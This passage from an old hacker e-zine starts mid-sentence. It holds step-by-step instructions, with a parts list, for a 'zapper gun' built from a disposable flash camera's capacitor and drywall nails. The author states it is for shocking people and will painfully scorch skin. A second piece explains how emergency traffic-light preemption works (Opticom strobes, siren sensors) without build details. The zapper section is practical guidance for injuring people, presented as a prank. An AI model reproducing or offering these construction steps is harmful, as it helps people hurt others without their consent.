that you'll be able to figure out how other boxes work. ========= -=How to make a ZaPPeR GuN=- -=By Panther Modern TNO/TBF=- The zapper gun is kinda like a commercial stun gun. It is not as powerful, and is mainly used to piss people off, not to put them down. It will scorch skin very painfully, if applied. Total cost for it is around $20-$25, and it is a fun thing to make if yer kinda bored. If you don't know what a capaciter is, read no further, go find out what one is/what one looks like, then come back. Anyway, materials are: -------------------------------------------------------------------- Qty Description Approx price -------------------------------------------------------------------- 01 Disposable Fugi-Film FLASH camera $15+TaX 01 Small-Mid radio shack projekt BoX $2-$3 or so.. 02 Dry wall nails 10-20 cents 01 Radio Shack SPST Push Button $1.50 01 1 Alkeline AA battery $0.50 -------------------------------------------------------------------- This is to make a fairly nice version. For the raw, crappy version, all you need is the camera. I won't even go into details on making it, you can figure it out for yerself. -------------------------------------------------------------------- Okay. Get the camera. If you want, take some pictures. ALL OF THEM, or none of them. Cause if you don't take all, you'll ruin the film.. Now, when yer ready, first, rip off the cardboard. You'll have a plastic box. Open it up, as well as you can. Be very careful not to damage the circuit board, wires, flash, etc. Once it's open, discard the plastic case, and the film. Now, looking at the circuit board, one can see a fairly empty space. Rite in the middle of it, will be 2 small copper "plates." Soldier your button to this place. YOu may also remove the flash at this time, as it will be shortly rendered useless. Also, you will notice two protrusions of copper strip. Pull 'em off, and MAKE SURE they aren't touching when you finish, cause it will ruin the gun. Next, put the circuit board in the project box. Drill one hole so you can see the LED. THis will tell you when the gun is ready to FIRE! (When the LED flashes). Next, line up approx where you want your two tips. Line up the capaciter with this. Drill holes. Next, drill one last hole where you want the button. Now, remove the generic AA battery in the camera, replace it with your hi-quality Alkeline AA battery. Now, stick the nails in, and soldier them via wires to the two capaciter leads. Seal them in place with either expoxy or hot glue. Now, wire up your button, and stik the LED in the hole you made for it. CLose up the box. Your gun is made.. Just push the button, holding down for apporx 2 seconds until the lite flashs, and touch whatever you want to SHOCK. This gun is semi-lame, but is also fun, and good for boredom..Have PhUn!! ========= Comments on Phrack 42 by Karb0n -=TNO=- Ok...I was reading a little of Phrack 42...in the first part of the issue I read this short post on turning traffic lights to green on your side.... I'm here to tell that fucker that you cannot do that anymore... Maybe where he lives you can...but not in Colorado.....he must have had an old system. Now i'm sure there are a few old lights around 303 that can still be used that way but...the metro are is not possible....i'll explain: There are three different ways to change a stoplight in your direction to green. 1) Manually Activated Devices: Traffic conroll devices of this type operate by a switch that is manually held until a Fire Engine or Ambulace clears the intersection. This switch can be set up on an automatic timer that iterrupts traffic flow until the apparatus responds, thens turns the light cycle back to normal. 2) Siren Activated Devices: The siren of the Apparatus or Police Unit activates this traffic controll device. A sound pick-up unit is located at each MAJOR intersection. This unit filters out all other noise except the siren and sends a signal to the traffic light selector in the control box. The traffic light selector holds the yellow light for a few seconds (to let cross-traffic pass through) and then switches to red..which flashes at double the normal rate. Alot of people think there car horn will set some of these off....no! Not true! 3) Light Activated Devices: (This is the one that d00d talked about in Phrack) This type of traffic controll device is activated by a Pulseating, High- Intensity Stobe light that sends a signal to a detector located at each major intersection. This dector holds the light green...if it happends to be green when your going through it, or speeds up the normal cycle to green in the direction of travel...(note: This means there is a RED light on three sides and GREEN only on yours). There is an indicating light located next to the light detector, assuring the driver that the traffic signal is in controll by the stobe light. Ok...The name of the stobe light system is called an OPTICOM. The key word in the upper paragraph was "HIGH-INTENSITY"...normal car do not have high intensity lights...even when you put your brights on. The OPTICOM flashes at over 14 times a second...it almost looks like a regular solid light..but nope. If you guys don't know what i'm talking about...next time you see a Fire Truck running with lights and siren...look at the top of the engine and you'll see it flashing away...actually..I think it's the most noticable thing.... Note: Police cars do not have these on them....and only some Ambulances. The reason Cops don't have them is because they have a car that is easier to manuver through other cars and intersections. But a fire enigine..with alot of water and very heavy can't turn on a dime...you'll be screwed in a second! So thats why Fire trucks have them and cops don't. SOme ambulances do...so keep an EYE out for it. Karb0n -=TNO=- Greets- Cavalier: Have you come up for air yet? Dead Kat: Was I abducted? Nuklear Phusion: Dude... the Delphi died. ========= CONCLUSION ~~~~~~~~~~ Well, thats it for our first issue. The next ones should be a bit longer and probably more technical. We hope that you found this publication both useful and interesting. If you have the urge to write a text file, please contact us at Flatline. The number is posted on many BBS's and many quality hackers have the number too. If you have any comments about this file, please let us know. We are more than open to suggestions on how to improve this 'zine and would appreciate feedback. Look for issue number 2 on a quality BBS near you!